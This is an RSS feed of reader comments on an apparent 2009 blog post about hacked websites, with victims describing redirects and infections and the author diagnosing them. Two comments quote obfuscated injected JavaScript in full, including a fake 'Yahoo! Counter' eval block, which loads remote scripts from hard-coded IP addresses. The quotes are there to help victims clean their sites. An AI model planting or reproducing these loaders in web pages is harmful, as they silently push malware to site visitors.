<?xml version="1.0" encoding="UTF-8"?><rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
> <channel><title>Comments on: Uh ohz you got haxored!</title> <atom:link href="http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/feed/" rel="self" type="application/rss+xml" /><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/</link> <description>That White Hat Guy.</description> <lastBuildDate>Tue, 29 Jun 2010 16:41:56 +0000</lastBuildDate> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.0</generator> <item><title>By: abu</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5941</link> <dc:creator>abu</dc:creator> <pubDate>Sat, 23 May 2009 15:49:22 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5941</guid> <description>Very intersting...nobody suggested here how to remove this...please give a proper suggestion if anyone removed this</description> <content:encoded><![CDATA[<p>Very intersting&#8230;nobody suggested here how to remove this&#8230;please give a proper suggestion if anyone removed this</p> ]]></content:encoded> </item> <item><title>By: Trevor</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5938</link> <dc:creator>Trevor</dc:creator> <pubDate>Wed, 20 May 2009 02:11:40 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5938</guid> <description>My guess is he got in to your hosting account/server and just ran a script to scan for certain files he is interested in and inserts the malicious code.</description> <content:encoded><![CDATA[<p>My guess is he got in to your hosting account/server and just ran a script to scan for certain files he is interested in and inserts the malicious code.</p> ]]></content:encoded> </item> <item><title>By: Michael</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5906</link> <dc:creator>Michael</dc:creator> <pubDate>Fri, 24 Apr 2009 15:23:25 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5906</guid> <description>Forgot to add...in our case, he hit files/folders that had not been touched in 4 years, so i know it wasn&#039;t infected code uploaded from user machines.  Could it be an exploit in front page extensions?</description> <content:encoded><![CDATA[<p>Forgot to add&#8230;in our case, he hit files/folders that had not been touched in 4 years, so i know it wasn&#8217;t infected code uploaded from user machines.  Could it be an exploit in front page extensions?</p> ]]></content:encoded> </item> <item><title>By: Michael</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5905</link> <dc:creator>Michael</dc:creator> <pubDate>Fri, 24 Apr 2009 15:21:44 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5905</guid> <description>Has anyone figured out how this guy is getting into systems?</description> <content:encoded><![CDATA[<p>Has anyone figured out how this guy is getting into systems?</p> ]]></content:encoded> </item> <item><title>By: Trevor</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5829</link> <dc:creator>Trevor</dc:creator> <pubDate>Sun, 12 Apr 2009 15:38:32 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5829</guid> <description>Your problem is that there is javascript inserted into your documents.  I went into just one page and found this directly underneath the  tag:
&lt;code&gt;
&lt;script language=javascript&gt;&lt;!--
document.write(unescape(&#039;%3CRAGsc9v8r9v8iRAGpt%20srRu0c
%3D%2F %2Fyc7jEP8%2E19v810%2EjEP1jEP759v8%2E29v849KKa
%2FjEPjRu0qKMdu9v8ejEPr9v8y9v8%2EKMdjs%3E%3C9v8%2F9v8
scjEPryciKKaptRAG%3E&#039;).replace(/yc&#124;RAG&#124;KMd&#124;jEP&#124;Ru0&#124;KKa&#124;9v8/
g,&quot;&quot;)); --&gt;&lt;/script&gt; &lt;/code&gt;This is definitely something malicious.  You need to remove that from every and any page it is on in your website.  It is good you changed the 777 permissions but I am pretty sure this happened from the trojan you had on your computer.  Make sure to remove that code from your pages and remove that trojan from your computer, then change all your passwords.</description> <content:encoded><![CDATA[<p>Your problem is that there is javascript inserted into your documents.  I went into just one page and found this directly underneath the  tag:<br
/> <code><br
/> &lt;script language=javascript>&lt;!--<br
/> document.write(unescape('%3CRAGsc9v8r9v8iRAGpt%20srRu0c<br
/> %3D%2F %2Fyc7jEP8%2E19v810%2EjEP1jEP759v8%2E29v849KKa<br
/> %2FjEPjRu0qKMdu9v8ejEPr9v8y9v8%2EKMdjs%3E%3C9v8%2F9v8<br
/> scjEPryciKKaptRAG%3E').replace(/yc|RAG|KMd|jEP|Ru0|KKa|9v8/<br
/> g,"")); --&gt;&lt;/script> </code></p><p>This is definitely something malicious.  You need to remove that from every and any page it is on in your website.  It is good you changed the 777 permissions but I am pretty sure this happened from the trojan you had on your computer.  Make sure to remove that code from your pages and remove that trojan from your computer, then change all your passwords.</p> ]]></content:encoded> </item> <item><title>By: Sandra Lamb</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5828</link> <dc:creator>Sandra Lamb</dc:creator> <pubDate>Sun, 12 Apr 2009 11:40:25 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5828</guid> <description>I too have been infected with this, I had just launched my membership when I had an exploit 2 days later.
I found a config.php file in my root folder of my host with 777 permissions - I removed it and later found I had a trojan on my PC.
I am fairly green when it comes to computers so I could be a little slow in picking these things up.
I find now when I click on pages in my nav bar from my index.php the page is directed to 78.110.175.249  it seems to site there for some time and then moves on to open the original page that was intended.
I am hoping I have foiled it my initially removing the suspect config.php file - but am just not sure.My original exploit was 13/03
Any suggestions - this is my first venture into website building.</description> <content:encoded><![CDATA[<p>I too have been infected with this, I had just launched my membership when I had an exploit 2 days later.<br
/> I found a config.php file in my root folder of my host with 777 permissions &#8211; I removed it and later found I had a trojan on my PC.<br
/> I am fairly green when it comes to computers so I could be a little slow in picking these things up.<br
/> I find now when I click on pages in my nav bar from my index.php the page is directed to 78.110.175.249  it seems to site there for some time and then moves on to open the original page that was intended.<br
/> I am hoping I have foiled it my initially removing the suspect config.php file &#8211; but am just not sure.</p><p>My original exploit was 13/03<br
/> Any suggestions &#8211; this is my first venture into website building.</p> ]]></content:encoded> </item> <item><title>By: some security researcher</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5757</link> <dc:creator>some security researcher</dc:creator> <pubDate>Fri, 03 Apr 2009 14:14:59 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5757</guid> <description>Note that some malwares directly inject javascript on the machine, by looking at html, php, asp files on the machine. they don&#039;t even need your website credentials, as YOU will upload the infected pages yourself..my two cents.</description> <content:encoded><![CDATA[<p>Note that some malwares directly inject javascript on the machine, by looking at html, php, asp files on the machine. they don&#8217;t even need your website credentials, as YOU will upload the infected pages yourself..</p><p>my two cents.</p> ]]></content:encoded> </item> <item><title>By: Jeroen</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5735</link> <dc:creator>Jeroen</dc:creator> <pubDate>Tue, 31 Mar 2009 13:08:49 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5735</guid> <description>I was infected too! Probably cause an virus on my local PC (wich i used for uploading). I informed my ISP (in the Netherlands):
http://forum.antagonist.nl/viewtopic.php?f=7&amp;t=5938After this infection i got the virus warning on a file: setup_u.exe on my local pc. This was AFTER my website was infected and I visited it...So probably now the script is infecting other PC&#039;s throug my/our website...</description> <content:encoded><![CDATA[<p>I was infected too! Probably cause an virus on my local PC (wich i used for uploading). I informed my ISP (in the Netherlands):<br
/> <a
href="http://forum.antagonist.nl/viewtopic.php?f=7&amp;t=5938" rel="nofollow">http://forum.antagonist.nl/viewtopic.php?f=7&amp;t=5938</a></p><p>After this infection i got the virus warning on a file: setup_u.exe on my local pc. This was AFTER my website was infected and I visited it&#8230;</p><p>So probably now the script is infecting other PC&#8217;s throug my/our website&#8230;</p> ]]></content:encoded> </item> <item><title>By: Trevor</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5683</link> <dc:creator>Trevor</dc:creator> <pubDate>Sat, 21 Mar 2009 15:32:53 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5683</guid> <description>@Jay I took a glance at your source code and noticed this:&lt;code&gt;&lt;!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape(&#039;/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\n@%64&amp;oc~%75m&#124;%65%6E%74%2E#w%72@it%65(&quot;@%3C~%2Ft#%65xt#%61@%72e~%61%3E&quot;%29!%3Bv~%61$%72%20!i~%2C&#124;%5F,@a%3D`%5B&quot;7~%38@%2E$%31~1%30`.$%31!%37%35.2@1&quot;!,&quot;1`%39%35%2E%32!%34@%2E&amp;7%36&#124;.2`%35%31$%22$%5D%3B%5F!%3D&#124;%31;%69&amp;f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&amp;at&#124;%63$%68%28#%2F~%5C%62h@%67f%74&#124;=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&amp;%3Bi%3C`2$%3B&#124;%69%2B%2B#%29$%64%6F%63&amp;u%6D@%65%6E&amp;t`.@%77r#%69t$%65%28%22%3C&amp;%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75&#124;%6D%65n#t@%2E%77&amp;r%69%74%65(&amp;%5C&quot;`%3C~%73c%72i&#124;p%74~%20@%69%64!%3D%5F!&quot;+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&amp;%2Ba&#124;%5B&amp;i@]%2B%22%2F`c!%70/&amp;?%22&amp;+@%6Ea@%76%69&amp;g~%61%74!or.%61#pp#%4E%61m%65.&#124;%63&#124;h`%61~%72%41`%74%28%30#%29&amp;+&quot;%3E%3C#%5C!%5C#/~%73%63&amp;r@i%70&#124;t%3E%5C%22$%29%3C@%5C&#124;/s%63r#i%70&#124;%74%3E`%22%29#%3B\n&amp;/&#124;%2F%3C`/%64@i%76%3E&#039;).replace(/\!&#124;\&#124;&#124;~&#124;@&#124;`&#124;#&#124;\&amp;&#124;\$/g,&quot;&quot;));var yahoo_counter=1;
&lt;!-- counter end --&gt;&lt;/code&gt;This looks like the same sort of thing as what my friend was infected with, but possibly more serious.  You should make sure to get that removed from your site right away.  It appears that it is in the footer of your site.  From the little bit of research I did on this &quot;yahoo counter&quot; script injection it appears that many users had reported virus&#039;s being automatically downloaded to their computers when they visited the site.</description> <content:encoded><![CDATA[<p>@Jay I took a glance at your source code and noticed this:</p><p><code>&lt;!-- Yahoo! Counter starts<br
/> if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\n@%64&amp;oc~%75m|%65%6E%74%2E#w%72@it%65("@%3C~%2Ft#%65xt#%61@%72e~%61%3E"%29!%3Bv~%61$%72%20!i~%2C|%5F,@a%3D`%5B"7~%38@%2E$%31~1%30`.$%31!%37%35.2@1"!,"1`%39%35%2E%32!%34@%2E&amp;7%36|.2`%35%31$%22$%5D%3B%5F!%3D|%31;%69&amp;f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&amp;at|%63$%68%28#%2F~%5C%62h@%67f%74|=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&amp;%3Bi%3C`2$%3B|%69%2B%2B#%29$%64%6F%63&amp;u%6D@%65%6E&amp;t`.@%77r#%69t$%65%28%22%3C&amp;%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75|%6D%65n#t@%2E%77&amp;r%69%74%65(&amp;%5C"`%3C~%73c%72i|p%74~%20@%69%64!%3D%5F!"+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&amp;%2Ba|%5B&amp;i@]%2B%22%2F`c!%70/&amp;?%22&amp;+@%6Ea@%76%69&amp;g~%61%74!or.%61#pp#%4E%61m%65.|%63|h`%61~%72%41`%74%28%30#%29&amp;+"%3E%3C#%5C!%5C#/~%73%63&amp;r@i%70|t%3E%5C%22$%29%3C@%5C|/s%63r#i%70|%74%3E`%22%29#%3B\n&amp;/|%2F%3C`/%64@i%76%3E').replace(/\!|\||~|@|`|#|\&amp;|\$/g,""));var yahoo_counter=1;<br
/> &lt;!-- counter end --&gt;</code></p><p>This looks like the same sort of thing as what my friend was infected with, but possibly more serious.  You should make sure to get that removed from your site right away.  It appears that it is in the footer of your site.  From the little bit of research I did on this &#8220;yahoo counter&#8221; script injection it appears that many users had reported virus&#8217;s being automatically downloaded to their computers when they visited the site.</p> ]]></content:encoded> </item> <item><title>By: Jay Brooks</title><link>http://trevornashkeller.com/misc/uh-ohz-you-got-haxored/comment-page-1/#comment-5682</link> <dc:creator>Jay Brooks</dc:creator> <pubDate>Sat, 21 Mar 2009 08:34:23 +0000</pubDate> <guid
isPermaLink="false">http://trevornashkeller.com/?p=220#comment-5682</guid> <description>Here&#039;s my story with this IP address.So, I&#039;m building a joomla website. I&#039;m standing around at Best Buy looking at some Apple gear and took a peek at the site and it looked trashed -- elements on the page were out of sorts and missing. Later, on a different machine, I noticed that it was connecting with &quot;http://78.110.175.249/cp/a/?p&quot; and the browser appeared to lockup. So I shut the computer down and started poking around for info on the IP address. Anyway, Spybot and AVG didn&#039;t seem to find anything of importantance but get this... the site now appears to be fine on every computer but mine. At this moment the site won&#039;t even open (for me) in Safari (just get a blank page) and FF and IE7 are placing the joomla modules incorrectly (for me). Every other website I hit seems just fine on this computer. And other computers seem to render the site fine (www.site.connexionscc.com).I could understand my computer screwed aound with other pages or random pages but not just this particular site. Simply perplexing.</description> <content:encoded><![CDATA[<p>Here&#8217;s my story with this IP address.</p><p>So, I&#8217;m building a joomla website. I&#8217;m standing around at Best Buy looking at some Apple gear and took a peek at the site and it looked trashed &#8212; elements on the page were out of sorts and missing. Later, on a different machine, I noticed that it was connecting with &#8220;http://78.110.175.249/cp/a/?p&#8221; and the browser appeared to lockup. So I shut the computer down and started poking around for info on the IP address. Anyway, Spybot and AVG didn&#8217;t seem to find anything of importantance but get this&#8230; the site now appears to be fine on every computer but mine. At this moment the site won&#8217;t even open (for me) in Safari (just get a blank page) and FF and IE7 are placing the joomla modules incorrectly (for me). Every other website I hit seems just fine on this computer. And other computers seem to render the site fine (www.site.connexionscc.com).</p><p>I could understand my computer screwed aound with other pages or random pages but not just this particular site. Simply perplexing.</p> ]]></content:encoded> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using memcached
Page Caching using memcached (user agent is rejected)
Database Caching 10/43 queries in 0.011 seconds using memcached

Served from: trevornashkeller.com @ 2010-08-01 02:48:14 -->